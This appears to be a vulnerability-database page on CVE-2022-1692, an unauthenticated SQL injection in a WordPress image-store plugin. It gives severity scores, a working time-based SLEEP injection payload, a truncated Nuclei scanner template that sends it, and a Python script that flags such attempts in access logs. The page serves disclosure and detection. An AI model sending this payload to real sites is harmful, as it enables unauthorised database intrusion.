CVE-2022-1692
Published: 2022-06-08

Priority: P2 · 68 · CVSS 3.1 base score 9.8 (critical)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public (EXPLOIT badge)
EPSS: 10.36% (95.1th percentile)

The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement on pages where the [codepeople-image-store] shortcode is embedded, allowing unauthenticated users to perform an SQL injection attack.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dwbooster | cp_image_store_with_slideshow | < 1.0.68 | 1.0.68 |
Detection & IOCs

Indicators extracted from sources:

- url: `{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20`
- other: `ordering_by=post_title DESC,(SELECT 9143 FROM (SELECT(SLEEP(8)))cFAm)--`

- Detect time-based blind SQLi attempts against WordPress sites using the CP Image Store plugin by monitoring GET requests whose 'ordering_by' query parameter contains SQL sleep payloads (the SLEEP function) and whose response duration is >= 8 seconds.
- Confirm the exploitation context by checking that the response body contains the string 'cpis_image=' alongside a 200 status code and the malicious ordering_by parameter.
- The vulnerable parameter is 'ordering_by' in GET requests to pages embedding the [codepeople-image-store] shortcode; unauthenticated users can inject SQL via this parameter.
- The vulnerability affects CP Image Store with Slideshow WordPress plugin versions before 1.0.68 only; it is patched in 1.0.68 and later.
- The SQLi is only exploitable on pages where the [codepeople-image-store] shortcode is embedded; a scanner must first discover such pages before attempting the injection.
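The detection logic in the bullets above, as an added example that is not part of this page or of the plugin or Nuclei project: a Python scanner that applies the same checks (GET request, 'ordering_by' carrying a SLEEP payload, 200 status, request time >= 8 s) to access-log lines. The nginx-style log format with a trailing $request_time field and the sample lines are assumptions constructed for illustration.

```python
"""Flag time-based blind SQLi attempts against the CP Image Store 'ordering_by'
parameter in web-server access logs (added example; log lines are constructed)."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed nginx-style lines: ... "$request" $status $bytes $request_time
# Line 1: the page's payload against a slow (vulnerable) site; line 4: the same
# payload against a site that answers fast (e.g. patched), so only an attempt.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jun/2022:10:01:02 +0000] "GET /gallery/?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20 HTTP/1.1" 200 5120 8.412
203.0.113.5 - - [08/Jun/2022:10:01:12 +0000] "GET /gallery/?ordering_by=post_title%20DESC HTTP/1.1" 200 5100 0.211
198.51.100.7 - - [08/Jun/2022:10:02:30 +0000] "GET /gallery/?ordering_by=post_date%20ASC HTTP/1.1" 200 5100 0.190
203.0.113.9 - - [08/Jun/2022:10:03:00 +0000] "GET /gallery/?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20 HTTP/1.1" 200 5090 0.250
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$')
SLEEP_RE = re.compile(r'\bSLEEP\s*\(', re.IGNORECASE)   # the page's SLEEP indicator
SLOW_SECONDS = 8.0   # mirrors 'duration >= 8' in the Nuclei template's DSL

def classify(line):
    """Return (verdict, decoded ordering_by value) for one access-log line:
    'exploit-likely' = SLEEP payload plus a 200 response taking >= SLOW_SECONDS,
    'attempt' = SLEEP payload without the timing effect, None = not an attempt."""
    m = LOG_RE.match(line)
    if not m or m['method'] != 'GET':
        return None, None
    qs = parse_qs(urlsplit(m['target']).query, keep_blank_values=True)
    for raw in qs.get('ordering_by', []):
        value = unquote_plus(raw)   # parse_qs decoded once; decode again for double encoding
        if SLEEP_RE.search(value):
            slow = m['status'] == '200' and float(m['rt']) >= SLOW_SECONDS
            return ('exploit-likely' if slow else 'attempt'), value
    return None, None

def scan(log_text):
    """Return [(client_ip, verdict, payload), ...] for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        verdict, payload = classify(line)
        if verdict is not None:
            hits.append((LOG_RE.match(line)['ip'], verdict, payload))
    return hits

if __name__ == '__main__':
    for ip, verdict, payload in scan(SAMPLE_LOG):
        print(f"{verdict:14} {ip:15} ordering_by={payload!r}")
```

The 'cpis_image=' body check from the Nuclei DSL cannot be applied from access logs alone; correlate the flagged requests with the page content or a WAF body capture to confirm the shortcode is present.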
CVSS provenance

- NVD, CVSS v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
No detection rules found.
Nuclei

CP Image Store with Slideshow <= 1.0.67 - SQL Injection (nuclei · CVSS 9.8)

CVE-2022-1692 [CRITICAL] CP Image Store with Slideshow <= 1.0.67 - SQL Injection

Template fragment as shown on the page (it begins mid-template and the path regex is cut off):

```yaml
CP Image Store with Slideshow '
        internal: true
    extractors:
      - type: regex
        name: path
        regex:
          - 'https?://[^/]+(/[a-zA-Z0-9][^'
        group: 1
        internal: true
  - method: GET
    path:
      - "{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20"
    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'contains(body, "cpis_image=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100d7b7e6a033a58e691b1ed9ab6d86ca6d1be42277ec98cb997f31c57f8d1a17ae02202a0e9265b8f43b69daafece755c6850925bc0470e293c81a587ab3fb46de3a7d:922c64590222798bb761d5b6d8e72950
```